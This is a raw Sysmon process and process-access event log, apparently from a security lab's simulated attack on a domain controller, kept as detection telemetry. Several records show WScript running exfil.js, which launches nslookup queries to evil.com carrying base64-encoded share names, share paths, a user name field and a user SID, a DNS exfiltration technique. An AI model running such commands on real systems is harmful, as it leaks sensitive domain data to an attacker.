14:21:45.045{2E1864BB-18E0-629A-6742-000000005F02}39766132C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-7F45-000000005F02}5484C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.048{2E1864BB-18F9-629A-7F45-000000005F02}5484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljmhg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.030{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvb.tmpMD5=D1A54A6F21A90F6B3FDD9CFE56E9C930,SHA256=5C5F1828A4B86FD4EE344674F6FC0762ED42C1A295A6FDEB230A8253C2750995,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.014{2E1864BB-18F8-629A-7D45-000000005F02}49283636C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-7E45-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.014{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.014{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.014{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.014{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.014{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-7E45-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.014{2E1864BB-18F8-629A-7C45-000000005F02}79487880C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-7E45-000000005F02}3300C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.014{2E1864BB-18F9-629A-7E45-000000005F02}3300C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-7C45-000000005F02}7948C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBTWVNWT0w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvb.tmp 2>&1 23542300x800000000000000044818Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:45.409{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDF4CBB06AF475039E1BD0A0171C7F19,SHA256=9D75D983F72DC8872469D895F3C4146A844031DB83FAEA215B1ADAC088FFE902,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.979{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-BF45-000000005F02}5740C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.979{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-BF45-000000005F02}5740C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.979{2E1864BB-18FA-629A-BF45-000000005F02}57401804C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-BE45-000000005F02}7884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.979{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-BF45-000000005F02}5740C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.964{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.964{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.964{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-BE45-000000005F02}7884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.964{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.964{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.964{2E1864BB-18E0-629A-6742-000000005F02}39764784C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-BE45-000000005F02}7884C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.969{2E1864BB-18FA-629A-BE45-000000005F02}7884C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbkk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.964{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nliqruh.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.917{2E1864BB-18FA-629A-BC45-000000005F02}62444156C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-BD45-000000005F02}7376C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.917{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.917{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.917{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.917{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.917{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-BD45-000000005F02}7376C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.917{2E1864BB-18FA-629A-BB45-000000005F02}45366168C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-BD45-000000005F02}7376C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.924{2E1864BB-18FA-629A-BD45-000000005F02}7376C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com 